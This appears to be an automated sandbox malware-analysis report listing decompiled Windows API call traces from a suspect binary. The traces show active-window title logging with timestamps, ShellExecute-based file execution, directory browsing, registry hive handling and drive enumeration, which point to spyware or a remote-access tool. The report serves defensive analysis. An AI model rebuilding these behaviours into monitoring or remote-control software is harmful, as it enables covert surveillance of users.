                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D50C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D523
                                                  • Part of subcall function 004119EF: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,75920F00,?,0040FC0A), ref: 004119FB
                                                  • Part of subcall function 004119EF: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040FC0A), ref: 00411A05
                                                  • Part of subcall function 004119EF: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411A19
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D538
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D545
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041496C), ref: 0040D568
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D580
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                 Similarity
                                                 • String ID: open
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00404791
                                                  • Part of subcall function 00411B14: GetForegroundWindow.USER32(?,00419BC8,?,?,?,?,?,?,?,?,0040479C), ref: 00411B1C
                                                  • Part of subcall function 00411B14: GetWindowTextLengthA.USER32(00000000), ref: 00411B25
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411B3E
                                                  • Part of subcall function 00411B14: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B47
                                                  • Part of subcall function 00411B14: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B51
                                                  • Part of subcall function 00411B14: GetWindowTextA.USER32(00000000,00000000), ref: 00411B59
                                                  • Part of subcall function 00411B14: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B68
                                                  • Part of subcall function 00411B14: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B72
                                                  • Part of subcall function 00411B14: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B7C
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004139EC,?,00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B93
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411BA2
                                                  • Part of subcall function 00411B14: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00411BD3
                                                  • Part of subcall function 00411B14: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411BFE
                                                  • Part of subcall function 00411B14: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411C07
                                                • Sleep.KERNEL32(000001F4), ref: 004047A8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004047BF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 004047CF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004047DC
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004047EB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004047F4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004047FD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404806
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404815
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00404833
                                                • Sleep.KERNEL32(00000064), ref: 00404847
                                                 Similarity
                                                 • String ID: [ $ ]
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                • sprintf.MSVCRT ref: 00405197
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051CD
                                                • SetEvent.KERNEL32(00000000), ref: 004051D6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                 Similarity
                                                 • String ID: { %04i/%02i/%02i %02i:%02i:%02i - $! }$6E@
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004035D1
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004035DA
                                                • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 004035F2
                                                • _itoa.MSVCRT ref: 004035F9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 0040360F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403617
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00403626
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00403633
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040363F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403648
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403651
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040365A
                                                • lstrlenA.KERNEL32(00000000), ref: 00403661
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403677
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403680
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403689
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000001), ref: 0040C8C7
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8DE
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 0040C8EF
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002), ref: 0040C903
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Viewing directory: ,00000000,?,?,?,00000000), ref: 0040C921
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Viewing directory: ,00000000,?,?,?,00000000), ref: 0040C932
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C946
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040C952
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                 Similarity
                                                 • String ID: Viewing directory: $[INFO]
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041259F
                                                • GetCursorPos.USER32(?), ref: 004125CA
                                                • SetForegroundWindow.USER32(?), ref: 004125D3
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 004125EE
                                                • Shell_NotifyIconA.SHELL32(00000002,00419F40), ref: 0041263F
                                                • ExitProcess.KERNEL32 ref: 00412647
                                                • CreatePopupMenu.USER32 ref: 0041264F
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00412664
                                                 Similarity
                                                 • String ID: Close
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM), ref: 0040B10B
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 0040B123
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B17B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B188
                                                 Similarity
                                                 • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                                APIs
                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0040E6D3
                                                • IsWindowVisible.USER32(?), ref: 0040E6DC
                                                • sprintf.MSVCRT ref: 0040E704
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E71B
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00414A54,?,00414A60), ref: 0040E743
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00414A60), ref: 0040E750
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00414A60), ref: 0040E75D
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00414A60), ref: 0040E76B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E774
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E77D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E786
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E78F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E798
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$D@2@@0@Hstd@@V10@V?$basic_string@$??0?$basic_string@Window$?c_str@?$basic_string@?length@?$basic_string@D@1@@G@1@@TextV01@V01@@VisibleY?$basic_string@sprintf
                                                • String ID:
                                                • API String ID: 3824165999-0
                                                • Opcode ID: 5324b5352426dfef4bf080be73a50e55f3f2aab2f427d74537ac98df6a10865f
                                                • Instruction ID: d601ed5e0296fe8f8445ded5789e739f9ef6fb3142b1abebd212a00d938c4586
                                                • Opcode Fuzzy Hash: 5324b5352426dfef4bf080be73a50e55f3f2aab2f427d74537ac98df6a10865f
                                                • Instruction Fuzzy Hash: 6F21A976D0010DABCF05EFA0EC499DE7B7CAF04709B108166F516E60A1EA789799CB98
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 0040C97E
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040C98B
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 0040C9AC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 0040C9BD
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
